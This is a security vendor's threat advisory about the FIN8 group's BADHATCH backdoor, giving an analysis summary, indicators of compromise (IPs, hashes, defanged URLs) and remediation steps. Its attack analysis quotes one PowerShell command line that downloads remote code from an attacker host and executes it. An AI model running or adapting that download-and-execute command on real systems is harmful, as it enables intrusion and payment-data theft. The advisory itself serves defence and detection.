Request a Demo
Rewterz
Informative Update – Microsoft Exchange One-Click On-Premises Mitigation Tool
March 16, 2021
Rewterz
Rewterz Threat Alert – New Mirai Variant Targeting New IoT Vulnerabilities, Network Security Devices
March 16, 2021

Rewterz Threat Alert – FIN8 Returns With Improved BADHATCH Toolkit

Severity

High

Analysis Summary

Fin8 made it’s debut in 2016 and is known to take long breaks to improve their TTPs. This group is known to have used a diverse array of techniques, from spear-phishing to zero-day exploits in Windows, to infect retail, hospitality and entertainment companies and steal payment card data from POS systems. The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal Powershell commands.

ATTACK ANALYSIS

Command line “powershell.exe -nop $pa=’sys’;iex (New-Object System.Net.WebClient). DownloadString(‘https://192-129-189-73[.]sslip[.]io/ yo’)”. It abuses sslip.io – a service that provides free IP to domain mapping to make SSL certificate generation easier (for traffic encryption). While the service is legitimate and widely used, the malware abuses it in an attempt at evading detection.

advisory-1615889834.png

Impact

  • Financial loss
  • Steal credit card information
  • Exposure of sensitive data 

Indicators of Compromise

IP

  • 198[.]46[.]140[.]52
  • 192[.]129[.]189[.]73

MD5

  • f12f70c4756826105d693af27bb10627
  • e73c4185f9712671c683f28fbddd1cca
  • bf7fcef0f51a7fe6d00752b8cdf25762
  • 5b638fde02fb7bf18ff68e9d99bd8de0
  • 39145f3e1ac2d74d19cb4137ee3db000

SHA-256

  • dbb3a665f9460343eb7625f8625815179e63aaa83f91b9283a296142ec4b2bbb
  • c328b3714df8400f4d4c071edb1f6d3b82d42488ebf8d9437c300bec9108755b
  • 981ecfc67d7192f0e82f3f8042d7c26c78396a3a62e5e34c717db31aee566eca
  • 428cf5d05d9c3d4f7601ff785a175c1d86a90fe060a1f33976b363e8f9530a88
  • 355d200eebf9d9102d5f2ba0c8a576948aef43640ae8f0eedf101e0e881be0b0

SHA1

  • 79e5ac6f2a517ab7fa0e2bd0103ea0c14958e8e9
  • 75fc0ce25767c0366b9c330de99f077620bb7c37
  • 5d97e581853be9a8ca94a3b09d9f75f4ce99ef56
  • 6c21e2aef9f3441786920acc6aa7bfddb240b2a6
  • f229183304a5a1308b844a06b2b618cdd5518111

URL

  • https[:]//192-129-189-73[.]sslip[.]io/yo
  • https[:]//192-129-189-73[.]sslip[.]io/80
  • https[:]//198-46-140-52[.]sslip[.]io/xxx

Remediation

  • Separate the POS network from the ones used by employees or guests.
  • Block all threat indicators at your respective controls.
  • Search for IOCs in your environment.